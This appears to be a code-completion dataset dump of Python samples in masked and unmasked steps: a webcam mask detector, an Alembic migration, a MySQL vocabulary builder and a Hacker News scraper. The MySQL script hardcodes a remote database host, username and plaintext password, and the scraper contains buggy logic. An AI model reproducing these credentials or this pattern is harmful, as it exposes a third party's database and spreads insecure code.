0.5], [0.5, 0.5, 0.5])]\n val_trans = Compose(val_trans)\n for i in range(5, 200):\n path = f'D:/temp_data/mask/test/{i}.jpg '\n print(path)\n image = cv2.imread(path)\n image = cv2.resize(image, (size, size))\n bboxes = det.predict(image.copy(), size, (0.2, 0.2))\n for cid, bbox in bboxes[0].items():\n cls = 'mask' if cid == 1 else 'face'\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid\n ].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, '{}:{}'.format(cls, int(prob * 100)), (b\n [0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2)\n cv2.imshow('image', image)\n cv2.waitKey()\n\n\ndef to_video(det):\n size = 512\n val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]\n cap = cv2.VideoCapture(0 + cv2.CAP_DSHOW)\n cap.set(3, 1920)\n cap.set(4, 1080)\n cap.set(cv2.CAP_PROP_FPS, 30)\n ret, frame = cap.read()\n while True:\n ret, frame = cap.read()\n frame = frame[:, ::-1]\n frame = frame[:, 440:-440]\n image = cv2.resize(frame, (size, size))\n bboxes = det.predict(image.copy(), size, (0.5, 0.5))\n for cid, bbox in bboxes[0].items():\n cls = 'mask' if cid == 1 else 'face'\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid\n ].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, '{}:{}'.format(cls, int(prob * 100)), (b\n [0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2)\n cv2.imshow('image', image)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n\n\nif __name__ == '__main__':\n det = Detector(classes_info, model_info, 'cuda')\n det.load_model('checkpoints/2021-03-08 00.11.56/epoch=331_4.7689.pth')\n to_video(det)\n", "step-3": "<mask token>\nnp.random.seed(3)\ncolors = np.random.randint(128, 256, (100, 3))\n\n\ndef to_image(det):\n size = 512\n val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]\n val_trans = Compose(val_trans)\n for i in range(5, 200):\n path = f'D:/temp_data/mask/test/{i}.jpg '\n print(path)\n image = cv2.imread(path)\n image = cv2.resize(image, (size, size))\n bboxes = det.predict(image.copy(), size, (0.2, 0.2))\n for cid, bbox in bboxes[0].items():\n cls = 'mask' if cid == 1 else 'face'\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid\n ].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, '{}:{}'.format(cls, int(prob * 100)), (b\n [0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2)\n cv2.imshow('image', image)\n cv2.waitKey()\n\n\ndef to_video(det):\n size = 512\n val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]\n cap = cv2.VideoCapture(0 + cv2.CAP_DSHOW)\n cap.set(3, 1920)\n cap.set(4, 1080)\n cap.set(cv2.CAP_PROP_FPS, 30)\n ret, frame = cap.read()\n while True:\n ret, frame = cap.read()\n frame = frame[:, ::-1]\n frame = frame[:, 440:-440]\n image = cv2.resize(frame, (size, size))\n bboxes = det.predict(image.copy(), size, (0.5, 0.5))\n for cid, bbox in bboxes[0].items():\n cls = 'mask' if cid == 1 else 'face'\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid\n ].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, '{}:{}'.format(cls, int(prob * 100)), (b\n [0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2)\n cv2.imshow('image', image)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n\n\nif __name__ == '__main__':\n det = Detector(classes_info, model_info, 'cuda')\n det.load_model('checkpoints/2021-03-08 00.11.56/epoch=331_4.7689.pth')\n to_video(det)\n", "step-4": "from core.detector import Detector\nfrom utils.augmentations import *\nfrom torchvision.transforms.transforms import Compose\nfrom config.mask_config import *\nfrom config.train_config import model_info\nnp.random.seed(3)\ncolors = np.random.randint(128, 256, (100, 3))\n\n\ndef to_image(det):\n size = 512\n val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]\n val_trans = Compose(val_trans)\n for i in range(5, 200):\n path = f'D:/temp_data/mask/test/{i}.jpg '\n print(path)\n image = cv2.imread(path)\n image = cv2.resize(image, (size, size))\n bboxes = det.predict(image.copy(), size, (0.2, 0.2))\n for cid, bbox in bboxes[0].items():\n cls = 'mask' if cid == 1 else 'face'\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid\n ].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, '{}:{}'.format(cls, int(prob * 100)), (b\n [0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2)\n cv2.imshow('image', image)\n cv2.waitKey()\n\n\ndef to_video(det):\n size = 512\n val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]\n cap = cv2.VideoCapture(0 + cv2.CAP_DSHOW)\n cap.set(3, 1920)\n cap.set(4, 1080)\n cap.set(cv2.CAP_PROP_FPS, 30)\n ret, frame = cap.read()\n while True:\n ret, frame = cap.read()\n frame = frame[:, ::-1]\n frame = frame[:, 440:-440]\n image = cv2.resize(frame, (size, size))\n bboxes = det.predict(image.copy(), size, (0.5, 0.5))\n for cid, bbox in bboxes[0].items():\n cls = 'mask' if cid == 1 else 'face'\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid\n ].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, '{}:{}'.format(cls, int(prob * 100)), (b\n [0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2)\n cv2.imshow('image', image)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n\n\nif __name__ == '__main__':\n det = Detector(classes_info, model_info, 'cuda')\n det.load_model('checkpoints/2021-03-08 00.11.56/epoch=331_4.7689.pth')\n to_video(det)\n", "step-5": "from core.detector import Detector\nfrom utils.augmentations import *\nfrom torchvision.transforms.transforms import Compose\nfrom config.mask_config import *\nfrom config.train_config import model_info\n\n\nnp.random.seed(3)\ncolors = np.random.randint(128, 256, (100, 3))\n\n\ndef to_image(det):\n size = 512\n\n val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]\n val_trans = Compose(val_trans)\n for i in range(5, 200):\n\n path = f\"D:/temp_data/mask/test/{i}.jpg \"\n print(path)\n image = cv2.imread(path)\n\n image = cv2.resize(image, (size, size))\n bboxes = det.predict(image.copy(), size, (0.2, 0.2))\n\n for cid, bbox in bboxes[0].items():\n cls = \"mask\" if cid == 1 else \"face\"\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, \"{}:{}\".format(cls, int(prob*100)), (b[0], b[1]), cv2.FONT_ITALIC, 1, colors[cid].tolist(), 2)\n cv2.imshow(\"image\", image)\n cv2.waitKey()\n\ndef to_video(det):\n size = 512\n\n val_trans = [Normalization([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])]\n\n cap = cv2.VideoCapture(0 + cv2.CAP_DSHOW) # 参数为0时调用本地摄像头;url连接调取网络摄像头;文件地址获取本地视频\n cap.set(3, 1920) # 设置分辨率\n cap.set(4, 1080)\n cap.set(cv2.CAP_PROP_FPS, 30)\n ret, frame = cap.read()\n while (True):\n ret, frame = cap.read()\n frame = frame[:, ::-1]\n frame = frame[:, 440: -440]\n image = cv2.resize(frame, (size, size))\n bboxes = det.predict(image.copy(), size, (0.5, 0.5))\n\n for cid, bbox in bboxes[0].items():\n cls = \"mask\" if cid == 1 else \"face\"\n for b in bbox:\n prob = b[-1]\n b = b[:4].astype(int)\n cv2.rectangle(image, (b[0], b[1]), (b[2], b[3]), colors[cid].tolist(), 1, cv2.LINE_AA)\n cv2.putText(image, \"{}:{}\".format(cls, int(prob * 100)), (b[0], b[1]), cv2.FONT_ITALIC, 1,\n colors[cid].tolist(), 2)\n cv2.imshow(\"image\", image)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nif __name__ == '__main__':\n det = Detector(classes_info, model_info, \"cuda\")\n det.load_model(\"checkpoints/2021-03-08 00.11.56/epoch=331_4.7689.pth\")\n # to_image(det)\n to_video(det)\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
s=input() count=0 while(len(s)!=1): count+=1 a=0 for i in range(len(s)): a+=int(s[i]) s=str(a) print(count)
normal
{ "blob_id": "638e21e1eb1e2e14244628260d9c7ac179983721", "index": 2541, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile len(s) != 1:\n count += 1\n a = 0\n for i in range(len(s)):\n a += int(s[i])\n s = str(a)\nprint(count)\n", "step-3": "s = input()\ncount = 0\nwhile len(s) != 1:\n count += 1\n a = 0\n for i in range(len(s)):\n a += int(s[i])\n s = str(a)\nprint(count)\n", "step-4": "s=input()\r\ncount=0\r\nwhile(len(s)!=1):\r\n count+=1\r\n a=0\r\n for i in range(len(s)):\r\n a+=int(s[i])\r\n s=str(a)\r\nprint(count)\r\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
"""Changed Views table name Revision ID: 7f559bb24ca4 Revises: cc927fe47c8f Create Date: 2021-08-20 23:20:31.959984 """ import sqlalchemy as sa from alembic import op # revision identifiers, used by Alembic. revision = "7f559bb24ca4" down_revision = "cc927fe47c8f" branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table( "views", sa.Column("id", sa.Integer(), autoincrement=True, nullable=False), sa.Column("url_id", sa.String(length=31), nullable=True), sa.ForeignKeyConstraint( ["url_id"], ["urls.id"], ), sa.PrimaryKeyConstraint("id"), ) op.drop_table("view") # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table( "view", sa.Column("id", sa.INTEGER(), nullable=False), sa.Column("url_id", sa.VARCHAR(length=31), nullable=True), sa.ForeignKeyConstraint( ["url_id"], ["urls.id"], ), sa.PrimaryKeyConstraint("id"), ) op.drop_table("views") # ### end Alembic commands ###
normal
{ "blob_id": "fd2b60de2ef540264855f04e1c5bcb9d1cf23c51", "index": 9561, "step-1": "<mask token>\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\ndef downgrade():\n op.create_table('view', sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('url_id', sa.VARCHAR(length=31), nullable=True), sa.\n ForeignKeyConstraint(['url_id'], ['urls.id']), sa.\n PrimaryKeyConstraint('id'))\n op.drop_table('views')\n", "step-3": "<mask token>\nrevision = '7f559bb24ca4'\ndown_revision = 'cc927fe47c8f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\ndef downgrade():\n op.create_table('view', sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('url_id', sa.VARCHAR(length=31), nullable=True), sa.\n ForeignKeyConstraint(['url_id'], ['urls.id']), sa.\n PrimaryKeyConstraint('id'))\n op.drop_table('views')\n", "step-4": "<mask token>\nimport sqlalchemy as sa\nfrom alembic import op\nrevision = '7f559bb24ca4'\ndown_revision = 'cc927fe47c8f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table('views', sa.Column('id', sa.Integer(), autoincrement=\n True, nullable=False), sa.Column('url_id', sa.String(length=31),\n nullable=True), sa.ForeignKeyConstraint(['url_id'], ['urls.id']),\n sa.PrimaryKeyConstraint('id'))\n op.drop_table('view')\n\n\ndef downgrade():\n op.create_table('view', sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('url_id', sa.VARCHAR(length=31), nullable=True), sa.\n ForeignKeyConstraint(['url_id'], ['urls.id']), sa.\n PrimaryKeyConstraint('id'))\n op.drop_table('views')\n", "step-5": "\"\"\"Changed Views table name\n\nRevision ID: 7f559bb24ca4\nRevises: cc927fe47c8f\nCreate Date: 2021-08-20 23:20:31.959984\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"7f559bb24ca4\"\ndown_revision = \"cc927fe47c8f\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"views\",\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"url_id\", sa.String(length=31), nullable=True),\n sa.ForeignKeyConstraint(\n [\"url_id\"],\n [\"urls.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.drop_table(\"view\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"view\",\n sa.Column(\"id\", sa.INTEGER(), nullable=False),\n sa.Column(\"url_id\", sa.VARCHAR(length=31), nullable=True),\n sa.ForeignKeyConstraint(\n [\"url_id\"],\n [\"urls.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.drop_table(\"views\")\n # ### end Alembic commands ###\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/env python # encoding=utf-8 import MySQLdb import re # 打开数据库连接 db = MySQLdb.connect(host='wonderfulloffline.mysql.rds.aliyuncs.com',port=3306,user='wonderfull_ai',password='868wxRHrPaTKkjvC', db='wonderfull_ai_online', charset='utf8' ) def load_stop_word(): stop_word=set() with open("data/stop_word.txt","r",encoding="utf-8") as file: for line in file.readlines(): stop_word.add(line.strip()) return stop_word # 使用cursor()方法获取操作游标 def get_goods_title_dict(stop_word_dict): cursor = db.cursor() # 使用execute方法执行SQL语句 cursor.execute("select goods_name FROM goods") # 使用 fetchone() 方法获取一条数据 data = cursor.fetchall() goods_name_dict=dict() idx=1 for line in data: title = line[0].strip().lower() for c in title: if(c.strip()==''): continue if(c in stop_word_dict): continue if(c not in goods_name_dict): goods_name_dict[c]=idx idx=idx+1 cursor.execute("select goods_name FROM goods where is_onsell=1") data = cursor.fetchall() regexp = r"[0-9a-z]+" pattern = re.compile(regexp) for line in data: title = line[0].strip().lower() match_res = pattern.findall(title) print(title,match_res) for item in match_res: if (item not in goods_name_dict): goods_name_dict[item] = idx idx = idx + 1 # 关闭数据库连接 # db.close() return goods_name_dict def write_dict(word_dict): file=open("data/vocab_unigram.txt","w",encoding="utf-8") file.write("[UNK]"+"\t"+"0"+"\n") for k,v in word_dict.items(): # print(k,v) file.write(k+"\t"+str(v)+"\n") file.close() if __name__ == '__main__': stop_word_dict=load_stop_word() goods_name_dict=get_goods_title_dict(stop_word_dict) # print(goods_name_dict) write_dict(goods_name_dict)
normal
{ "blob_id": "4942b20a8e4f58c52b82800fb4c59db169cd8048", "index": 3562, "step-1": "<mask token>\n\n\ndef load_stop_word():\n stop_word = set()\n with open('data/stop_word.txt', 'r', encoding='utf-8') as file:\n for line in file.readlines():\n stop_word.add(line.strip())\n return stop_word\n\n\n<mask token>\n\n\ndef write_dict(word_dict):\n file = open('data/vocab_unigram.txt', 'w', encoding='utf-8')\n file.write('[UNK]' + '\\t' + '0' + '\\n')\n for k, v in word_dict.items():\n file.write(k + '\\t' + str(v) + '\\n')\n file.close()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef load_stop_word():\n stop_word = set()\n with open('data/stop_word.txt', 'r', encoding='utf-8') as file:\n for line in file.readlines():\n stop_word.add(line.strip())\n return stop_word\n\n\ndef get_goods_title_dict(stop_word_dict):\n cursor = db.cursor()\n cursor.execute('select goods_name FROM goods')\n data = cursor.fetchall()\n goods_name_dict = dict()\n idx = 1\n for line in data:\n title = line[0].strip().lower()\n for c in title:\n if c.strip() == '':\n continue\n if c in stop_word_dict:\n continue\n if c not in goods_name_dict:\n goods_name_dict[c] = idx\n idx = idx + 1\n cursor.execute('select goods_name FROM goods where is_onsell=1')\n data = cursor.fetchall()\n regexp = '[0-9a-z]+'\n pattern = re.compile(regexp)\n for line in data:\n title = line[0].strip().lower()\n match_res = pattern.findall(title)\n print(title, match_res)\n for item in match_res:\n if item not in goods_name_dict:\n goods_name_dict[item] = idx\n idx = idx + 1\n return goods_name_dict\n\n\ndef write_dict(word_dict):\n file = open('data/vocab_unigram.txt', 'w', encoding='utf-8')\n file.write('[UNK]' + '\\t' + '0' + '\\n')\n for k, v in word_dict.items():\n file.write(k + '\\t' + str(v) + '\\n')\n file.close()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef load_stop_word():\n stop_word = set()\n with open('data/stop_word.txt', 'r', encoding='utf-8') as file:\n for line in file.readlines():\n stop_word.add(line.strip())\n return stop_word\n\n\ndef get_goods_title_dict(stop_word_dict):\n cursor = db.cursor()\n cursor.execute('select goods_name FROM goods')\n data = cursor.fetchall()\n goods_name_dict = dict()\n idx = 1\n for line in data:\n title = line[0].strip().lower()\n for c in title:\n if c.strip() == '':\n continue\n if c in stop_word_dict:\n continue\n if c not in goods_name_dict:\n goods_name_dict[c] = idx\n idx = idx + 1\n cursor.execute('select goods_name FROM goods where is_onsell=1')\n data = cursor.fetchall()\n regexp = '[0-9a-z]+'\n pattern = re.compile(regexp)\n for line in data:\n title = line[0].strip().lower()\n match_res = pattern.findall(title)\n print(title, match_res)\n for item in match_res:\n if item not in goods_name_dict:\n goods_name_dict[item] = idx\n idx = idx + 1\n return goods_name_dict\n\n\ndef write_dict(word_dict):\n file = open('data/vocab_unigram.txt', 'w', encoding='utf-8')\n file.write('[UNK]' + '\\t' + '0' + '\\n')\n for k, v in word_dict.items():\n file.write(k + '\\t' + str(v) + '\\n')\n file.close()\n\n\nif __name__ == '__main__':\n stop_word_dict = load_stop_word()\n goods_name_dict = get_goods_title_dict(stop_word_dict)\n write_dict(goods_name_dict)\n", "step-4": "<mask token>\ndb = MySQLdb.connect(host='wonderfulloffline.mysql.rds.aliyuncs.com', port=\n 3306, user='wonderfull_ai', password='868wxRHrPaTKkjvC', db=\n 'wonderfull_ai_online', charset='utf8')\n\n\ndef load_stop_word():\n stop_word = set()\n with open('data/stop_word.txt', 'r', encoding='utf-8') as file:\n for line in file.readlines():\n stop_word.add(line.strip())\n return stop_word\n\n\ndef get_goods_title_dict(stop_word_dict):\n cursor = db.cursor()\n cursor.execute('select goods_name FROM goods')\n data = cursor.fetchall()\n goods_name_dict = dict()\n idx = 1\n for line in data:\n title = line[0].strip().lower()\n for c in title:\n if c.strip() == '':\n continue\n if c in stop_word_dict:\n continue\n if c not in goods_name_dict:\n goods_name_dict[c] = idx\n idx = idx + 1\n cursor.execute('select goods_name FROM goods where is_onsell=1')\n data = cursor.fetchall()\n regexp = '[0-9a-z]+'\n pattern = re.compile(regexp)\n for line in data:\n title = line[0].strip().lower()\n match_res = pattern.findall(title)\n print(title, match_res)\n for item in match_res:\n if item not in goods_name_dict:\n goods_name_dict[item] = idx\n idx = idx + 1\n return goods_name_dict\n\n\ndef write_dict(word_dict):\n file = open('data/vocab_unigram.txt', 'w', encoding='utf-8')\n file.write('[UNK]' + '\\t' + '0' + '\\n')\n for k, v in word_dict.items():\n file.write(k + '\\t' + str(v) + '\\n')\n file.close()\n\n\nif __name__ == '__main__':\n stop_word_dict = load_stop_word()\n goods_name_dict = get_goods_title_dict(stop_word_dict)\n write_dict(goods_name_dict)\n", "step-5": "#!/usr/bin/env python\r\n# encoding=utf-8\r\nimport MySQLdb\r\nimport re\r\n\r\n# 打开数据库连接\r\ndb = MySQLdb.connect(host='wonderfulloffline.mysql.rds.aliyuncs.com',port=3306,user='wonderfull_ai',password='868wxRHrPaTKkjvC', db='wonderfull_ai_online', charset='utf8' )\r\n\r\ndef load_stop_word():\r\n stop_word=set()\r\n with open(\"data/stop_word.txt\",\"r\",encoding=\"utf-8\") as file:\r\n for line in file.readlines():\r\n stop_word.add(line.strip())\r\n return stop_word\r\n\r\n# 使用cursor()方法获取操作游标\r\ndef get_goods_title_dict(stop_word_dict):\r\n cursor = db.cursor()\r\n # 使用execute方法执行SQL语句\r\n cursor.execute(\"select goods_name FROM goods\")\r\n # 使用 fetchone() 方法获取一条数据\r\n data = cursor.fetchall()\r\n goods_name_dict=dict()\r\n idx=1\r\n\r\n for line in data:\r\n title = line[0].strip().lower()\r\n for c in title:\r\n if(c.strip()==''):\r\n continue\r\n if(c in stop_word_dict):\r\n continue\r\n if(c not in goods_name_dict):\r\n goods_name_dict[c]=idx\r\n idx=idx+1\r\n\r\n cursor.execute(\"select goods_name FROM goods where is_onsell=1\")\r\n data = cursor.fetchall()\r\n regexp = r\"[0-9a-z]+\"\r\n pattern = re.compile(regexp)\r\n for line in data:\r\n title = line[0].strip().lower()\r\n match_res = pattern.findall(title)\r\n print(title,match_res)\r\n for item in match_res:\r\n if (item not in goods_name_dict):\r\n goods_name_dict[item] = idx\r\n idx = idx + 1\r\n\r\n # 关闭数据库连接\r\n # db.close()\r\n return goods_name_dict\r\n\r\ndef write_dict(word_dict):\r\n file=open(\"data/vocab_unigram.txt\",\"w\",encoding=\"utf-8\")\r\n file.write(\"[UNK]\"+\"\\t\"+\"0\"+\"\\n\")\r\n for k,v in word_dict.items():\r\n # print(k,v)\r\n file.write(k+\"\\t\"+str(v)+\"\\n\")\r\n file.close()\r\n\r\nif __name__ == '__main__':\r\n stop_word_dict=load_stop_word()\r\n goods_name_dict=get_goods_title_dict(stop_word_dict)\r\n # print(goods_name_dict)\r\n write_dict(goods_name_dict)", "step-ids": [ 2, 3, 4, 5, 7 ] }
[ 2, 3, 4, 5, 7 ]
# -*- coding: utf-8 -*- import requests import csv from lxml import html import json class ycombinatorParser(): siteurl = 'https://news.ycombinator.com/' def getNextPage(pageurl): response = requests.get(pageurl) parsed_body = html.fromstring(response.text) nextpage=parsed_body.xpath('//a[@class="morelink"]') try: nexthref=nextpage[0].get('href') except IndexError: nexthref = '' return nexthref def parsePage(parsed_body,rownumber): def jsonWriteLine(rownumber,title,autor,url,site): line = '{"Rownumber": %d,\n "title": "%s",\n "autor": "%s",\n "url": "%s",\n "site": "%s",\n }\n' %(rownumber,title,autor,url,site) #print line return line def getNews(rownews): newsdict = {} for news in rownews: newsdict["title"] = ''.join(news.xpath('./a/text()')) for i in news.xpath('./a'): newsdict["url"] = i.get('href') newsdict["site"] = ''.join(news.xpath('./span/a/span/text()')) return newsdict def getAuthor(rowautor): authordict = {} for author in rowautor: authordict["autor"] = ''.join(author.xpath('./a[1]/text()')) return authordict for row in parsed_body.xpath('//tr'): rownews = row.xpath('./td[@class="title"][2]') rowautor = row.xpath('./td[@class="subtext"][1]') datadict = {} rowdata = {} if rownews: datadict = getNews(rownews) if rowautor: for author in rowautor: datadict = getAuthor(rowautor) if datadict: autor = '' try: title=datadict["title"] url=datadict["url"] site=datadict["site"] except KeyError: autor = datadict["autor"] if autor: rowdata['rownumber'] = str(rownumber) rowdata['title'] = str(title) rowdata['autor'] = str(autor) rowdata['url'] = str(url) rowdata['site'] = str(site) with open('nix.json',mode='a') as f: json.dump(rowdata,f) #outputfile.write(jsonWriteLine(rownumber,title,autor,url,site)) #print jsonWriteLine(rownumber,title,autor,url,site) rownumber += 1 if rownumber>2: exit() return rownumber def __unicode__(self): return unicode(self.rowdata) pageflag = True rownumber = 1 pageparse = siteurl with open('nix.json',mode='w') as f: json.dump('',f) while pageflag: response = requests.get(pageparse) parsed_body = html.fromstring(response.text) rownumber = parsePage(parsed_body,rownumber)-1 pageparse = siteurl+getNextPage(pageparse) if pageparse == siteurl: pageflag = False if __name__ == '__main__': ycombinatorParser()
normal
{ "blob_id": "87c27711c0089ca2c7e5c7d0e9edb51b9d4008d9", "index": 6717, "step-1": "<mask token>\n\n\nclass ycombinatorParser:\n <mask token>\n\n def getNextPage(pageurl):\n response = requests.get(pageurl)\n parsed_body = html.fromstring(response.text)\n nextpage = parsed_body.xpath('//a[@class=\"morelink\"]')\n try:\n nexthref = nextpage[0].get('href')\n except IndexError:\n nexthref = ''\n return nexthref\n\n def parsePage(parsed_body, rownumber):\n\n def jsonWriteLine(rownumber, title, autor, url, site):\n line = (\n \"\"\"{\"Rownumber\": %d,\n \"title\": \"%s\",\n \"autor\": \"%s\",\n \"url\": \"%s\",\n \"site\": \"%s\",\n }\n\"\"\"\n % (rownumber, title, autor, url, site))\n return line\n\n def getNews(rownews):\n newsdict = {}\n for news in rownews:\n newsdict['title'] = ''.join(news.xpath('./a/text()'))\n for i in news.xpath('./a'):\n newsdict['url'] = i.get('href')\n newsdict['site'] = ''.join(news.xpath('./span/a/span/text()'))\n return newsdict\n\n def getAuthor(rowautor):\n authordict = {}\n for author in rowautor:\n authordict['autor'] = ''.join(author.xpath('./a[1]/text()'))\n return authordict\n for row in parsed_body.xpath('//tr'):\n rownews = row.xpath('./td[@class=\"title\"][2]')\n rowautor = row.xpath('./td[@class=\"subtext\"][1]')\n datadict = {}\n rowdata = {}\n if rownews:\n datadict = getNews(rownews)\n if rowautor:\n for author in rowautor:\n datadict = getAuthor(rowautor)\n if datadict:\n autor = ''\n try:\n title = datadict['title']\n url = datadict['url']\n site = datadict['site']\n except KeyError:\n autor = datadict['autor']\n if autor:\n rowdata['rownumber'] = str(rownumber)\n rowdata['title'] = str(title)\n rowdata['autor'] = str(autor)\n rowdata['url'] = str(url)\n rowdata['site'] = str(site)\n with open('nix.json', mode='a') as f:\n json.dump(rowdata, f)\n rownumber += 1\n if rownumber > 2:\n exit()\n return rownumber\n\n def __unicode__(self):\n return unicode(self.rowdata)\n <mask token>\n <mask token>\n <mask token>\n with open('nix.json', mode='w') as f:\n json.dump('', f)\n while pageflag:\n response = requests.get(pageparse)\n parsed_body = html.fromstring(response.text)\n rownumber = parsePage(parsed_body, rownumber) - 1\n pageparse = siteurl + getNextPage(pageparse)\n if pageparse == siteurl:\n pageflag = False\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass ycombinatorParser:\n siteurl = 'https://news.ycombinator.com/'\n\n def getNextPage(pageurl):\n response = requests.get(pageurl)\n parsed_body = html.fromstring(response.text)\n nextpage = parsed_body.xpath('//a[@class=\"morelink\"]')\n try:\n nexthref = nextpage[0].get('href')\n except IndexError:\n nexthref = ''\n return nexthref\n\n def parsePage(parsed_body, rownumber):\n\n def jsonWriteLine(rownumber, title, autor, url, site):\n line = (\n \"\"\"{\"Rownumber\": %d,\n \"title\": \"%s\",\n \"autor\": \"%s\",\n \"url\": \"%s\",\n \"site\": \"%s\",\n }\n\"\"\"\n % (rownumber, title, autor, url, site))\n return line\n\n def getNews(rownews):\n newsdict = {}\n for news in rownews:\n newsdict['title'] = ''.join(news.xpath('./a/text()'))\n for i in news.xpath('./a'):\n newsdict['url'] = i.get('href')\n newsdict['site'] = ''.join(news.xpath('./span/a/span/text()'))\n return newsdict\n\n def getAuthor(rowautor):\n authordict = {}\n for author in rowautor:\n authordict['autor'] = ''.join(author.xpath('./a[1]/text()'))\n return authordict\n for row in parsed_body.xpath('//tr'):\n rownews = row.xpath('./td[@class=\"title\"][2]')\n rowautor = row.xpath('./td[@class=\"subtext\"][1]')\n datadict = {}\n rowdata = {}\n if rownews:\n datadict = getNews(rownews)\n if rowautor:\n for author in rowautor:\n datadict = getAuthor(rowautor)\n if datadict:\n autor = ''\n try:\n title = datadict['title']\n url = datadict['url']\n site = datadict['site']\n except KeyError:\n autor = datadict['autor']\n if autor:\n rowdata['rownumber'] = str(rownumber)\n rowdata['title'] = str(title)\n rowdata['autor'] = str(autor)\n rowdata['url'] = str(url)\n rowdata['site'] = str(site)\n with open('nix.json', mode='a') as f:\n json.dump(rowdata, f)\n rownumber += 1\n if rownumber > 2:\n exit()\n return rownumber\n\n def __unicode__(self):\n return unicode(self.rowdata)\n pageflag = True\n rownumber = 1\n pageparse = siteurl\n with open('nix.json', mode='w') as f:\n json.dump('', f)\n while pageflag:\n response = requests.get(pageparse)\n parsed_body = html.fromstring(response.text)\n rownumber = parsePage(parsed_body, rownumber) - 1\n pageparse = siteurl + getNextPage(pageparse)\n if pageparse == siteurl:\n pageflag = False\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass ycombinatorParser:\n siteurl = 'https://news.ycombinator.com/'\n\n def getNextPage(pageurl):\n response = requests.get(pageurl)\n parsed_body = html.fromstring(response.text)\n nextpage = parsed_body.xpath('//a[@class=\"morelink\"]')\n try:\n nexthref = nextpage[0].get('href')\n except IndexError:\n nexthref = ''\n return nexthref\n\n def parsePage(parsed_body, rownumber):\n\n def jsonWriteLine(rownumber, title, autor, url, site):\n line = (\n 